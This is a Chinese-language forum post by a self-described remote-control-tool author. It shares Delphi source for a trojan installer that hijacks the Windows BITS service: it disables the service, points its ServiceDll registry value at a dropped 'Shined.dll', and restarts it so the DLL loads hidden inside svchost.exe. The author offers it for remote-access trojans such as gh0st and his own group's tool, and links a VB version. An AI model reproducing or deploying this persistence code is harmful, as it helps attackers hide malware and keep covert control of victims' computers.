建立svchost.exe启动的服务现在貌似很流行，黑洞，gh0st和我们小组的远控都是这种方式，主要是隐蔽性高。我发出来替换服务的方式添加，现在VB版的正在写，就是遇到了点问题，比较恶心，很快就能解决，写完了第一时间发出来！

DELPHI代码如下：

{安装单元
完成进度：服务安装
日期：2008，9，16
作者：Lenk（L.S.T）}
unit Unt_Install;

interface
  Uses Windows,WinSvc,WinSvcEx,Unt_Const;

procedure Install;stdcall;

const
  SrvName='BITS';

implementation

procedure Install;
var
  DllPath:String;
begin

 DllPath:=SystemDir+'Shined.dll';
 if FileExists(DllPath) then
  begin
    ConfigServiceEx(SrvName, SERVICE_DISABLED);
    StartServiceEx(nil,SrvName,False);
    SetStrToReg(HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\BITS\Parameters', 'ServiceDll', Pchar(DLLPath));
    SetStrToReg(HKEY_LOCAL_MACHINE, 'SYSTEM\ControlSet003\Services\BITS\Parameters', 'ServiceDll', Pchar(DLLPath));
    ConfigServiceEx(SrvName, SERVICE_AUTO_START);
    StartServiceEx(nil, SrvName, True);
  end;
end;

end.

看这个就能理解是什么意思了，VB版的也写完了

http://fenlog.com/post/46.html

谢谢大家支持！~